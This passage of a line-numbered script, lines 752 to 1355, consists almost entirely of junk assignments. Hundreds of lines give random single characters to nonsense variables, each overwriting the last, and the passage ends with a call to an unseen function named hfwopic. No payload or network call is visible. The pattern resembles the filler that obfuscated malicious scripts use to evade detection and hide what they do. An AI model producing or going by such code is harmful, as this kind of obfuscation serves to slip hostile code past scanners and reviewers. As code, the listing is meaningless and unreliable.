752 | ubfdk = "P"; | |
753 | ubfdk = "T"; | |
754 | ubfdk = "h"; | |
755 | ubfdk = "L"; | |
756 | ubfdk = "S"; | |
757 | ubfdk = "Y"; | |
758 | ubfdk = "Y"; | |
759 | ubfdk = "A"; | |
760 | ubfdk = "p"; | |
761 | ubfdk = "Y"; | |
762 | ubfdk = "g"; | |
763 | ubfdk = "B"; | |
764 | ubfdk = "i"; | |
765 | ubfdk = "Z"; | |
766 | ubfdk = "x"; | |
767 | ubfdk = "r"; | |
768 | ubfdk = "I"; | |
769 | ubfdk = "P"; | |
770 | mxovhsy = "y"; | |
771 | mxovhsy = "_"; | |
772 | dzjoh = "d"; | |
773 | dzjoh = "T"; | |
774 | dzjoh = "k"; | |
775 | dzjoh = "q"; | |
776 | pgseevurl = "p"; | |
777 | pgseevurl = "M"; | |
778 | pgseevurl = "L"; | |
779 | pgseevurl = "p"; | |
780 | pgseevurl = "l"; | |
781 | pgseevurl = "K"; | |
782 | pgseevurl = "n"; | |
783 | pgseevurl = "F"; | |
784 | pgseevurl = "M"; | |
785 | pgseevurl = "x"; | |
786 | pgseevurl = "D"; | |
787 | pgseevurl = "V"; | |
788 | pgseevurl = "X"; | |
789 | pgseevurl = "k"; | |
790 | pgseevurl = "t"; | |
791 | qndoaxwz = "c"; | |
792 | qndoaxwz = "t"; | |
793 | qndoaxwz = "W"; | |
794 | qndoaxwz = "o"; | |
795 | qndoaxwz = "C"; | |
796 | qndoaxwz = "M"; | |
797 | qndoaxwz = "n"; | |
798 | qndoaxwz = "U"; | |
799 | qndoaxwz = "p"; | |
800 | qndoaxwz = "J"; | |
801 | qndoaxwz = "F"; | |
802 | qndoaxwz = "Z"; | |
803 | qndoaxwz = "V"; | |
804 | qndoaxwz = "S"; | |
805 | qndoaxwz = "H"; | |
806 | qndoaxwz = "H"; | |
807 | qndoaxwz = "E"; | |
808 | qndoaxwz = "J"; | |
809 | qndoaxwz = "m"; | |
810 | qndoaxwz = "I"; | |
811 | qndoaxwz = "n"; | |
812 | qndoaxwz = "U"; | |
813 | qndoaxwz = "N"; | |
814 | qndoaxwz = "I"; | |
815 | qndoaxwz = "q"; | |
816 | qndoaxwz = "j"; | |
817 | qndoaxwz = "K"; | |
818 | qndoaxwz = "v"; | |
819 | qndoaxwz = "u"; | |
820 | qlbkyxue = "t"; | |
821 | qlbkyxue = "a"; | |
822 | qlbkyxue = "W"; | |
823 | qlbkyxue = "e"; | |
824 | qlbkyxue = "H"; | |
825 | qlbkyxue = "W"; | |
826 | qlbkyxue = "X"; | |
827 | qlbkyxue = "c"; | |
828 | qlbkyxue = "U"; | |
829 | qlbkyxue = "b"; | |
830 | qlbkyxue = "I"; | |
831 | qlbkyxue = "H"; | |
832 | qlbkyxue = "Y"; | |
833 | qlbkyxue = "f"; | |
834 | qlbkyxue = "Y"; | |
835 | qlbkyxue = "t"; | |
836 | qlbkyxue = "v"; | |
837 | qlbkyxue = "d"; | |
838 | qlbkyxue = "/"; | |
839 | wwhbrpvrh = "Y"; | |
840 | wwhbrpvrh = "m"; | |
841 | wwhbrpvrh = "G"; | |
842 | wwhbrpvrh = "z"; | |
843 | wwhbrpvrh = "j"; | |
844 | wwhbrpvrh = "F"; | |
845 | wwhbrpvrh = "q"; | |
846 | wwhbrpvrh = "R"; | |
847 | wwhbrpvrh = "w"; | |
848 | wwhbrpvrh = "I"; | |
849 | wwhbrpvrh = "P"; | |
850 | wwhbrpvrh = "F"; | |
851 | wwhbrpvrh = "m"; | |
852 | wwhbrpvrh = "i"; | |
853 | wwhbrpvrh = "g"; | |
854 | wwhbrpvrh = "G"; | |
855 | wwhbrpvrh = "b"; | |
856 | cdytkmg = "h"; | |
857 | cdytkmg = "d"; | |
858 | cdytkmg = "h"; | |
859 | cdytkmg = "X"; | |
860 | cdytkmg = "u"; | |
861 | cdytkmg = "l"; | |
862 | cdytkmg = "V"; | |
863 | cdytkmg = "d"; | |
864 | cdytkmg = "S"; | |
865 | cdytkmg = "n"; | |
866 | cdytkmg = "h"; | |
867 | cdytkmg = "E"; | |
868 | cdytkmg = "q"; | |
869 | cdytkmg = "G"; | |
870 | cdytkmg = "n"; | |
871 | cdytkmg = "w"; | |
872 | cdytkmg = "K"; | |
873 | cdytkmg = "y"; | |
874 | cdytkmg = "C"; | |
875 | cdytkmg = "V"; | |
876 | cdytkmg = "z"; | |
877 | cdytkmg = "C"; | |
878 | cdytkmg = "f"; | |
879 | cdytkmg = "L"; | |
880 | cdytkmg = "P"; | |
881 | cdytkmg = "M"; | |
882 | cdytkmg = "D"; | |
883 | cdytkmg = "o"; | |
884 | cdytkmg = "a"; | |
885 | cdytkmg = "F"; | |
886 | cdytkmg = "z"; | |
887 | cdytkmg = "i"; | |
888 | cdytkmg = "k"; | |
889 | cdytkmg = "V"; | |
890 | cdytkmg = "h"; | |
891 | cdytkmg = "S"; | |
892 | cdytkmg = "B"; | |
893 | cdytkmg = "m"; | |
894 | cdytkmg = "B"; | |
895 | cdytkmg = "Q"; | |
896 | kmiwm = "K"; | |
897 | kmiwm = "v"; | |
898 | kmiwm = "L"; | |
899 | kmiwm = "J"; | |
900 | kmiwm = "K"; | |
901 | kmiwm = "O"; | |
902 | kmiwm = "N"; | |
903 | kmiwm = "B"; | |
904 | kmiwm = "O"; | |
905 | kmiwm = "Y"; | |
906 | kmiwm = "n"; | |
907 | kmiwm = "T"; | |
908 | kmiwm = "F"; | |
909 | kmiwm = "C"; | |
910 | kmiwm = "D"; | |
911 | kmiwm = "o"; | |
912 | kmiwm = "C"; | |
913 | kmiwm = "B"; | |
914 | kmiwm = "L"; | |
915 | kmiwm = "n"; | |
916 | kmiwm = "U"; | |
917 | kmiwm = "r"; | |
918 | kmiwm = "s"; | |
919 | lmywp = "K"; | |
920 | lmywp = "o"; | |
921 | lmywp = "s"; | |
922 | lmywp = "j"; | |
923 | lmywp = "G"; | |
924 | lmywp = "F"; | |
925 | lmywp = "D"; | |
926 | lmywp = "s"; | |
927 | lmywp = "R"; | |
928 | lmywp = "m"; | |
929 | lmywp = "p"; | |
930 | lmywp = "n"; | |
931 | lmywp = "E"; | |
932 | lmywp = "o"; | |
933 | lmywp = "G"; | |
934 | lmywp = "C"; | |
935 | lmywp = "U"; | |
936 | lmywp = "u"; | |
937 | lmywp = "f"; | |
938 | lmywp = "x"; | |
939 | lmywp = "S"; | |
940 | lmywp = "r"; | |
941 | lmywp = "J"; | |
942 | lmywp = "p"; | |
943 | lmywp = "F"; | |
944 | lmywp = "s"; | |
945 | lmywp = "Z"; | |
946 | lmywp = "v"; | |
947 | lmywp = "j"; | |
948 | lmywp = "v"; | |
949 | lmywp = "z"; | |
950 | lmywp = "x"; | |
951 | lmywp = "b"; | |
952 | lmywp = "y"; | |
953 | lmywp = "C"; | |
954 | lmywp = "V"; | |
955 | lmywp = "K"; | |
956 | lmywp = "h"; | |
957 | womre = "U"; | |
958 | womre = "j"; | |
959 | womre = "v"; | |
960 | womre = "z"; | |
961 | womre = "O"; | |
962 | womre = "T"; | |
963 | womre = "e"; | |
964 | womre = "o"; | |
965 | womre = "n"; | |
966 | womre = "R"; | |
967 | womre = "J"; | |
968 | womre = "p"; | |
969 | womre = "w"; | |
970 | womre = "N"; | |
971 | womre = "y"; | |
972 | womre = "a"; | |
973 | womre = "g"; | |
974 | womre = "k"; | |
975 | womre = "Z"; | |
976 | womre = "p"; | |
977 | womre = "C"; | |
978 | womre = "u"; | |
979 | womre = "F"; | |
980 | womre = "y"; | |
981 | womre = "w"; | |
982 | womre = "F"; | |
983 | womre = "T"; | |
984 | womre = "t"; | |
985 | womre = "P"; | |
986 | womre = "b"; | |
987 | womre = "K"; | |
988 | womre = "G"; | |
989 | womre = "l"; | |
990 | womre = "b"; | |
991 | womre = "A"; | |
992 | womre = "r"; | |
993 | evluuioq = "Y"; | |
994 | evluuioq = "P"; | |
995 | evluuioq = "Y"; | |
996 | evluuioq = "J"; | |
997 | evluuioq = "P"; | |
998 | evluuioq = "f"; | |
999 | evluuioq = "g"; | |
1000 | evluuioq = "f"; | |
1001 | evluuioq = "b"; | |
1002 | evluuioq = "C"; | |
1003 | evluuioq = "k"; | |
1004 | evluuioq = "d"; | |
1005 | evluuioq = "j"; | |
1006 | evluuioq = "w"; | |
1007 | evluuioq = "P"; | |
1008 | evluuioq = "V"; | |
1009 | evluuioq = "W"; | |
1010 | evluuioq = "K"; | |
1011 | evluuioq = "h"; | |
1012 | evluuioq = "E"; | |
1013 | evluuioq = "D"; | |
1014 | evluuioq = "E"; | |
1015 | evluuioq = "y"; | |
1016 | evluuioq = "C"; | |
1017 | evluuioq = "A"; | |
1018 | evluuioq = "e"; | |
1019 | evluuioq = "d"; | |
1020 | evluuioq = "Q"; | |
1021 | evluuioq = "t"; | |
1022 | evluuioq = "s"; | |
1023 | evluuioq = "y"; | |
1024 | evluuioq = "y"; | |
1025 | evluuioq = "O"; | |
1026 | evluuioq = "K"; | |
1027 | evluuioq = "e"; | |
1028 | evluuioq = "r"; | |
1029 | evluuioq = "c"; | |
1030 | evluuioq = "x"; | |
1031 | evluuioq = "X"; | |
1032 | evluuioq = "F"; | |
1033 | evluuioq = "m"; | |
1034 | evluuioq = "o"; | |
1035 | evluuioq = "N"; | |
1036 | evluuioq = "U"; | |
1037 | svkax = "v"; | |
1038 | svkax = "y"; | |
1039 | svkax = "x"; | |
1040 | svkax = "N"; | |
1041 | svkax = "Z"; | |
1042 | svkax = "u"; | |
1043 | svkax = "G"; | |
1044 | svkax = "F"; | |
1045 | svkax = "k"; | |
1046 | svkax = "v"; | |
1047 | svkax = "t"; | |
1048 | svkax = "q"; | |
1049 | svkax = "L"; | |
1050 | svkax = "b"; | |
1051 | svkax = "E"; | |
1052 | rfrfamjw = "T"; | |
1053 | rfrfamjw = "y"; | |
1054 | rfrfamjw = "B"; | |
1055 | rfrfamjw = "y"; | |
1056 | rfrfamjw = "f"; | |
1057 | rfrfamjw = "q"; | |
1058 | rfrfamjw = "D"; | |
1059 | rfrfamjw = "S"; | |
1060 | rfrfamjw = "i"; | |
1061 | rfrfamjw = "W"; | |
1062 | rfrfamjw = "d"; | |
1063 | rfrfamjw = "l"; | |
1064 | rfrfamjw = "V"; | |
1065 | rfrfamjw = "S"; | |
1066 | rfrfamjw = "X"; | |
1067 | rfrfamjw = "c"; | |
1068 | rfrfamjw = "U"; | |
1069 | rfrfamjw = "D"; | |
1070 | rfrfamjw = "X"; | |
1071 | rfrfamjw = "v"; | |
1072 | rfrfamjw = "w"; | |
1073 | rfrfamjw = "J"; | |
1074 | rfrfamjw = "t"; | |
1075 | rfrfamjw = "l"; | |
1076 | oytrie = "E"; | |
1077 | oytrie = "R"; | |
1078 | oytrie = "Y"; | |
1079 | oytrie = "J"; | |
1080 | oytrie = "i"; | |
1081 | oytrie = "q"; | |
1082 | oytrie = "D"; | |
1083 | oytrie = "v"; | |
1084 | oytrie = "S"; | |
1085 | oytrie = "t"; | |
1086 | oytrie = "Z"; | |
1087 | oytrie = "o"; | |
1088 | oytrie = "o"; | |
1089 | oytrie = "P"; | |
1090 | oytrie = "h"; | |
1091 | oytrie = "w"; | |
1092 | oytrie = "t"; | |
1093 | oytrie = "r"; | |
1094 | oytrie = "D"; | |
1095 | oytrie = "F"; | |
1096 | oytrie = "z"; | |
1097 | oytrie = "X"; | |
1098 | oytrie = "k"; | |
1099 | oytrie = "C"; | |
1100 | oytrie = "l"; | |
1101 | oytrie = "f"; | |
1102 | oytrie = "x"; | |
1103 | oytrie = "b"; | |
1104 | oytrie = "&"; | |
1105 | wavyhkwy = "q"; | |
1106 | wavyhkwy = "W"; | |
1107 | wavyhkwy = "h"; | |
1108 | wavyhkwy = "j"; | |
1109 | wavyhkwy = "h"; | |
1110 | wavyhkwy = "o"; | |
1111 | wavyhkwy = "b"; | |
1112 | wavyhkwy = "Z"; | |
1113 | wavyhkwy = "X"; | |
1114 | wavyhkwy = "o"; | |
1115 | wavyhkwy = "k"; | |
1116 | wavyhkwy = "Q"; | |
1117 | wavyhkwy = "X"; | |
1118 | wavyhkwy = "v"; | |
1119 | wavyhkwy = "u"; | |
1120 | wavyhkwy = "V"; | |
1121 | wavyhkwy = "U"; | |
1122 | wavyhkwy = "x"; | |
1123 | wavyhkwy = "@"; | |
1124 | hyiwml = "g"; | |
1125 | hyiwml = "U"; | |
1126 | hyiwml = "b"; | |
1127 | hyiwml = "p"; | |
1128 | hyiwml = "G"; | |
1129 | hyiwml = "r"; | |
1130 | hyiwml = "v"; | |
1131 | hyiwml = "G"; | |
1132 | hyiwml = "Y"; | |
1133 | hyiwml = "N"; | |
1134 | hyiwml = "K"; | |
1135 | hyiwml = "T"; | |
1136 | hyiwml = "T"; | |
1137 | hyiwml = "C"; | |
1138 | hyiwml = "F"; | |
1139 | hyiwml = "V"; | |
1140 | hyiwml = "X"; | |
1141 | hyiwml = "M"; | |
1142 | hyiwml = "M"; | |
1143 | hyiwml = "d"; | |
1144 | hyiwml = "F"; | |
1145 | hyiwml = "n"; | |
1146 | hyiwml = "n"; | |
1147 | hyiwml = "V"; | |
1148 | hyiwml = "x"; | |
1149 | eksknfdk = "N"; | |
1150 | eksknfdk = "b"; | |
1151 | eksknfdk = "g"; | |
1152 | eksknfdk = "W"; | |
1153 | eksknfdk = "Q"; | |
1154 | eksknfdk = "G"; | |
1155 | eksknfdk = "P"; | |
1156 | eksknfdk = "h"; | |
1157 | eksknfdk = "z"; | |
1158 | eksknfdk = "H"; | |
1159 | eksknfdk = "5"; | |
1160 | brqyeurtj = "F"; | |
1161 | brqyeurtj = "B"; | |
1162 | brqyeurtj = "T"; | |
1163 | brqyeurtj = "G"; | |
1164 | brqyeurtj = "z"; | |
1165 | brqyeurtj = "g"; | |
1166 | brqyeurtj = "E"; | |
1167 | brqyeurtj = "Q"; | |
1168 | brqyeurtj = "v"; | |
1169 | brqyeurtj = "q"; | |
1170 | brqyeurtj = "F"; | |
1171 | brqyeurtj = "f"; | |
1172 | iqngwygd = "N"; | |
1173 | iqngwygd = "L"; | |
1174 | iqngwygd = "r"; | |
1175 | iqngwygd = "k"; | |
1176 | iqngwygd = "T"; | |
1177 | iqngwygd = "w"; | |
1178 | iqngwygd = "O"; | |
1179 | iqngwygd = "T"; | |
1180 | iqngwygd = "K"; | |
1181 | iqngwygd = "F"; | |
1182 | iqngwygd = "R"; | |
1183 | iqngwygd = "u"; | |
1184 | iqngwygd = "i"; | |
1185 | hseqexz = "C"; | |
1186 | hseqexz = "G"; | |
1187 | hseqexz = "E"; | |
1188 | hseqexz = "q"; | |
1189 | hseqexz = "P"; | |
1190 | hseqexz = "P"; | |
1191 | hseqexz = "A"; | |
1192 | hseqexz = "T"; | |
1193 | hseqexz = "X"; | |
1194 | hseqexz = "t"; | |
1195 | hseqexz = "p"; | |
1196 | hseqexz = "w"; | |
1197 | hseqexz = "Z"; | |
1198 | hseqexz = "a"; | |
1199 | eydukfsbv = "b"; | |
1200 | eydukfsbv = "L"; | |
1201 | eydukfsbv = "s"; | |
1202 | eydukfsbv = "k"; | |
1203 | eydukfsbv = "L"; | |
1204 | eydukfsbv = "M"; | |
1205 | eydukfsbv = "G"; | |
1206 | eydukfsbv = "b"; | |
1207 | eydukfsbv = "r"; | |
1208 | eydukfsbv = "e"; | |
1209 | eydukfsbv = "A"; | |
1210 | eydukfsbv = "z"; | |
1211 | eydukfsbv = "o"; | |
1212 | eydukfsbv = "L"; | |
1213 | xyuiwrz = "H"; | |
1214 | xyuiwrz = "U"; | |
1215 | xyuiwrz = "K"; | |
1216 | xyuiwrz = "b"; | |
1217 | xyuiwrz = "z"; | |
1218 | xyuiwrz = "V"; | |
1219 | xyuiwrz = "x"; | |
1220 | xyuiwrz = "a"; | |
1221 | xyuiwrz = "c"; | |
1222 | xyuiwrz = "i"; | |
1223 | xyuiwrz = "w"; | |
1224 | xyuiwrz = "p"; | |
1225 | xyuiwrz = "F"; | |
1226 | xyuiwrz = "X"; | |
1227 | xyuiwrz = "x"; | |
1228 | xyuiwrz = "n"; | |
1229 | xyuiwrz = "m"; | |
1230 | xyuiwrz = "K"; | |
1231 | xyuiwrz = "e"; | |
1232 | xyuiwrz = "H"; | |
1233 | xyuiwrz = "i"; | |
1234 | xyuiwrz = "I"; | |
1235 | xyuiwrz = "h"; | |
1236 | xyuiwrz = "3"; | |
1237 | qznuwavux = "b"; | |
1238 | qznuwavux = "z"; | |
1239 | qznuwavux = "Y"; | |
1240 | qznuwavux = "C"; | |
1241 | zloxedf = "N"; | |
1242 | zloxedf = "p"; | |
1243 | zloxedf = "l"; | |
1244 | zloxedf = "P"; | |
1245 | zloxedf = "j"; | |
1246 | zloxedf = "y"; | |
1247 | zloxedf = "X"; | |
1248 | zloxedf = "T"; | |
1249 | zloxedf = "y"; | |
1250 | zloxedf = "I"; | |
1251 | zloxedf = "i"; | |
1252 | zloxedf = "M"; | |
1253 | zloxedf = "V"; | |
1254 | zloxedf = "v"; | |
1255 | zloxedf = "s"; | |
1256 | zloxedf = "n"; | |
1257 | gcxvz = "y"; | |
1258 | gcxvz = "g"; | |
1259 | gcxvz = "s"; | |
1260 | gcxvz = "p"; | |
1261 | gcxvz = "x"; | |
1262 | gcxvz = "h"; | |
1263 | gcxvz = "0"; | |
1264 | bdspek = "r"; | |
1265 | bdspek = "p"; | |
1266 | bdspek = "E"; | |
1267 | bdspek = "H"; | |
1268 | bdspek = "V"; | |
1269 | bdspek = "K"; | |
1270 | bdspek = "o"; | |
1271 | jsdzqrur = "F"; | |
1272 | jsdzqrur = "Q"; | |
1273 | jsdzqrur = "4"; | |
1274 | flmunuv = "J"; | |
1275 | flmunuv = "y"; | |
1276 | flmunuv = "m"; | |
1277 | flmunuv = "t"; | |
1278 | flmunuv = "O"; | |
1279 | flmunuv = "I"; | |
1280 | flmunuv = "f"; | |
1281 | flmunuv = "K"; | |
1282 | flmunuv = "y"; | |
1283 | flmunuv = "R"; | |
1284 | flmunuv = "o"; | |
1285 | flmunuv = "E"; | |
1286 | flmunuv = "T"; | |
1287 | flmunuv = "j"; | |
1288 | flmunuv = "z"; | |
1289 | flmunuv = "C"; | |
1290 | flmunuv = "p"; | |
1291 | flmunuv = "l"; | |
1292 | flmunuv = "Q"; | |
1293 | flmunuv = "Z"; | |
1294 | flmunuv = "h"; | |
1295 | flmunuv = "C"; | |
1296 | flmunuv = "I"; | |
1297 | flmunuv = "q"; | |
1298 | flmunuv = "S"; | |
1299 | flmunuv = "b"; | |
1300 | flmunuv = "N"; | |
1301 | flmunuv = "l"; | |
1302 | flmunuv = "y"; | |
1303 | flmunuv = "C"; | |
1304 | flmunuv = "r"; | |
1305 | flmunuv = "H"; | |
1306 | flmunuv = "c"; | |
1307 | flmunuv = "P"; | |
1308 | flmunuv = "D"; | |
1309 | flmunuv = "h"; | |
1310 | flmunuv = "o"; | |
1311 | flmunuv = "Q"; | |
1312 | flmunuv = "1"; | |
1313 | bizzjp = "m"; | |
1314 | bizzjp = "A"; | |
1315 | bizzjp = "h"; | |
1316 | bizzjp = "j"; | |
1317 | bizzjp = "A"; | |
1318 | bizzjp = "m"; | |
1319 | bizzjp = "n"; | |
1320 | bizzjp = "p"; | |
1321 | bizzjp = "J"; | |
1322 | bizzjp = "C"; | |
1323 | bizzjp = "L"; | |
1324 | bizzjp = "U"; | |
1325 | bizzjp = "V"; | |
1326 | bizzjp = "C"; | |
1327 | bizzjp = "w"; | |
1328 | bizzjp = "c"; | |
1329 | bizzjp = "x"; | |
1330 | bizzjp = "w"; | |
1331 | bizzjp = "l"; | |
1332 | bizzjp = "z"; | |
1333 | bizzjp = "o"; | |
1334 | bizzjp = "V"; | |
1335 | bizzjp = "w"; | |
1336 | bizzjp = "L"; | |
1337 | bizzjp = "G"; | |
1338 | bizzjp = "t"; | |
1339 | bizzjp = "O"; | |
1340 | bizzjp = "d"; | |
1341 | bizzjp = "n"; | |
1342 | bizzjp = "T"; | |
1343 | bizzjp = "m"; | |
1344 | bizzjp = "L"; | |
1345 | bizzjp = "X"; | |
1346 | bizzjp = "U"; | |
1347 | bizzjp = "z"; | |
1348 | bizzjp = "L"; | |
1349 | bizzjp = "w"; | |
1350 | bizzjp = "D"; | |
1351 | bizzjp = "N"; | |
1352 | bizzjp = "d"; | |
1353 | xpokymi = "l"; | |
1354 | xpokymi = "N"; | |
1355 | hfwopic ( ); |
|